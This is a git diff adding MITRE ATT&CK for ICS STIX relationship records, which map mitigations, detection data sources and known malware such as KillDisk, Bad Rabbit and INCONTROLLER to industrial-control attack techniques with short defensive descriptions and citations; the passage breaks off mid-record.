a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00b98fa6-4913-40a4-8920-befed8621c41.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00b98fa6-4913-40a4-8920-befed8621c41.json new file mode 100644 index 0000000000000000000000000000000000000000..1786841dc2e7b641afe2d6007581cfcbff92ba62 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00b98fa6-4913-40a4-8920-befed8621c41.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--f2e66b39-3e2e-4b07-a150-3a386996ad73", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00b98fa6-4913-40a4-8920-befed8621c41", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:15:33.180Z", + "description": "Monitor ICS asset application logs that indicate alarm settings have changed, although not all assets will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6.json new file mode 100644 index 0000000000000000000000000000000000000000..9de936149020834e25463d10494756bd9e855e02 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--ec48195d-870a-4719-99ef-03c1769e0f2d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00e6c22b-9275-4039-b6d4-2ac0680325d6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--01b4a92f-da42-4dfa-8d59-53709b65940e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--01b4a92f-da42-4dfa-8d59-53709b65940e.json new file mode 100644 index 0000000000000000000000000000000000000000..ac91e52e6d6e48ce22fb0e6fa952809a08b79e04 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--01b4a92f-da42-4dfa-8d59-53709b65940e.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--a489d389-d34b-48ef-b635-30413e9854e7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--01b4a92f-da42-4dfa-8d59-53709b65940e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.203Z", + "relationship_type": "mitigates", + "description": "Limit privileges of user accounts and groups so that only authorized administrators can change service states and configurations.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0278ddbc-67d5-444d-8082-bf9974dee920.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0278ddbc-67d5-444d-8082-bf9974dee920.json new file mode 100644 index 0000000000000000000000000000000000000000..55234173a0001d99ff4cb8fb7734f570c48f481e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0278ddbc-67d5-444d-8082-bf9974dee920.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2e295321-79e2-44af-b0b3-7e2a53a65f8e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0278ddbc-67d5-444d-8082-bf9974dee920", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:45.775Z", + "description": "Monitor for an authentication attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81.json new file mode 100644 index 0000000000000000000000000000000000000000..b7ffb3aa941e55f401f64e1d1f660a1a7ee1bf6d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--ed2527ae-58ae-4498-bfb7-41ec38c357d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--028a3bcc-f299-4061-a0f2-8da85e0a3c81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.177Z", + "relationship_type": "mitigates", + "description": "Authenticate connections from software and devices to prevent unauthorized systems from accessing protected management functions.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35.json new file mode 100644 index 0000000000000000000000000000000000000000..968171c5068d49936dbf61fff73a4c17da3dedec --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--099aa404-bdb1-49aa-8333-1ee0aee3a186", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:27:54.588Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022.json new file mode 100644 index 0000000000000000000000000000000000000000..806a2711ab4faf91dd64dfef78312931bbdfbec8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c03fd171-0bc3-4a9e-83a4-5bbbca426efd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03ad6a9a-4443-4e33-a7a5-933e22f2e022", + "created": "2022-09-27T17:39:15.655Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:24.399Z", + "description": "Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as Server Message Block (SMB).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3.json new file mode 100644 index 0000000000000000000000000000000000000000..2bf412025222239b9bd77cc6c9629152630317d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--f215e062-dae1-4796-ada0-bd327f3db6f0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91.json new file mode 100644 index 0000000000000000000000000000000000000000..5b62dcf7be80c5f75d332b61d0ffd24ac3689f82 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--922e83d8-5a3f-44f6-a92d-849e51707365", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91", + "created": "2023-03-30T19:00:12.380Z", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:00:12.380Z", + "description": "Information which is sensitive to the operation and architecture of the process environment may be encrypted to ensure confidentiality and restrict access to only those who need to know. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04882fef-2a6b-40d0-a101-da9c76a3572e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04882fef-2a6b-40d0-a101-da9c76a3572e.json new file mode 100644 index 0000000000000000000000000000000000000000..4bc2a670b4048d4201b482bb49cf7c48303db42f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04882fef-2a6b-40d0-a101-da9c76a3572e.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--d921494d-55de-4e54-8a6b-dcaefe809595", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04882fef-2a6b-40d0-a101-da9c76a3572e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "Restrict the use of untrusted or unknown libraries, such as remote or unknown DLLs.\n", + "source_ref": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0491ef92-2941-4841-9fe6-2e1809788b52.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0491ef92-2941-4841-9fe6-2e1809788b52.json new file mode 100644 index 0000000000000000000000000000000000000000..5594bca183135fa9359d507a3358feae0ee21722 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--0491ef92-2941-4841-9fe6-2e1809788b52.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--3f2a5ccb-49f8-4116-a2de-ddfafc41ac4e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0491ef92-2941-4841-9fe6-2e1809788b52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.210Z", + "relationship_type": "mitigates", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04bf72de-75ba-4d95-ad24-f93ad835180c.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04bf72de-75ba-4d95-ad24-f93ad835180c.json new file mode 100644 index 0000000000000000000000000000000000000000..698fad0b197d5836b6a9b21e0befd6bf8e90752c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04bf72de-75ba-4d95-ad24-f93ad835180c.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ce95dcc8-4fb9-4b73-916a-24b8545b3404", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--04bf72de-75ba-4d95-ad24-f93ad835180c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:54:26.520Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) erases the master boot record (MBR) and system logs, leaving the system unusable. (Citation: Booz Allen Hamilton)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1.json new file mode 100644 index 0000000000000000000000000000000000000000..ee32622b56a34d00da83df5b0ff4c146ac3505ad --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--99635a42-1b05-4b6c-99e8-b0af13b71fdc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Perform integrity checks of firmware before uploading it on a device. Utilize cryptographic hashes to verify the firmware has not been tampered with by comparing it to a trusted hash of the firmware. This could be from trusted data sources (e.g., vendor site) or through a third-party verification service.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--052552e9-eac0-4b37-9df8-2e921053e305.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--052552e9-eac0-4b37-9df8-2e921053e305.json new file mode 100644 index 0000000000000000000000000000000000000000..2bfc7ae2471c1a15d327abcf2a8a08c3b53c9be1 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--052552e9-eac0-4b37-9df8-2e921053e305.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--b191c7c5-d8d4-476a-b10f-b11bf7e9e52f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--052552e9-eac0-4b37-9df8-2e921053e305", + "created": "2023-03-30T19:05:17.003Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:05:17.003Z", + "description": "Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (e.g., .pdf, .docx, .jpg, .dwg ) or local databases.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--058396ca-3af4-444b-b261-74485c47e68c.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--058396ca-3af4-444b-b261-74485c47e68c.json new file mode 100644 index 0000000000000000000000000000000000000000..9fb783318314ac6d6c20a5128a5069baa13f3fbb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--058396ca-3af4-444b-b261-74485c47e68c.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--97f4700c-8801-4444-a132-e9023fdd5a94", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--058396ca-3af4-444b-b261-74485c47e68c", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:17.124Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--064dfd6f-db5d-48e8-b350-9dd47a270911.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--064dfd6f-db5d-48e8-b350-9dd47a270911.json new file mode 100644 index 0000000000000000000000000000000000000000..6c268c8446016b56838b47c08c12ed335d1f5452 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--064dfd6f-db5d-48e8-b350-9dd47a270911.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--fd96f454-33b5-4544-8fab-403822fc94b8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--064dfd6f-db5d-48e8-b350-9dd47a270911", + "created": "2022-09-28T20:22:09.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:16:59.156Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely read the OCP UA structure from devices.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06782c99-93de-4db9-9c30-6f96aef894d2.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06782c99-93de-4db9-9c30-6f96aef894d2.json new file mode 100644 index 0000000000000000000000000000000000000000..0bec267d3f76c71911b614db57c2644b92aa1a30 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--06782c99-93de-4db9-9c30-6f96aef894d2.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7edd1292-92ce-4981-82d2-bf3b186da4d5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--06782c99-93de-4db9-9c30-6f96aef894d2", + "created": "2023-03-30T19:06:49.501Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:06:49.501Z", + "description": "Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--067932c3-0011-4ca2-9bbe-721c631e4e41.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--067932c3-0011-4ca2-9bbe-721c631e4e41.json new file mode 100644 index 0000000000000000000000000000000000000000..5829800629cb3d8300d1ebb9bccace7e40ddcd27 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--067932c3-0011-4ca2-9bbe-721c631e4e41.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--320eee39-b451-423e-857c-9618106ebb70", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--067932c3-0011-4ca2-9bbe-721c631e4e41", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 